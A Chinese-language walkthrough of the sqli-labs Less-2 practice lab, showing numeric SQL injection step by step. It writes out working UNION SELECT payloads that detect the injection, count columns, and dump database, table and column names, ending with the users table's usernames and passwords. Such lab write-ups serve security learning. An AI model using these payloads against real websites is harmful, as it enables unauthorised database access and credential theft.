sqli-labs Less-2

1.判断注入类型

index.php?id=1*1
index.php?id=1*2

id=1
id=2

2.猜字段数

index.php?id=1 order by 4#
index.php?id=1 order by 3#

index.php?id=1 order by 4#
index.php?id=1 order by 3#

第一次报错，第二次未报错，说明当前数据库当前表存在3个字段

3.使用联合查询查看页面的显示位

index.php?id=-1 union select 1,2,3#

这里需要注意的是id需要是一个数据库中不存在的id，因为只有这样，页面才会显示我们后面联合查询的数据。

4.爆出数据库版本和当前数据库名

index.php?id=-1 union select 1,database(),version()#

5.爆出所有数据库

index.php?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata --+

所有数据库名

ctftraining,information_schema,mysql,performance_schema,security,test

6.爆出当前数据库所有表

index.php?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security" --+

emails,referers,uagents,users

7.查询当前数据库users表所有字段

index.php?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users" #

image.png

id,username,password,ip,time,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password

9.查询数据

index.php?id=-1 union select 1,group_concat(username),group_concat(password) from users #

image.png

成功读取数据库数据。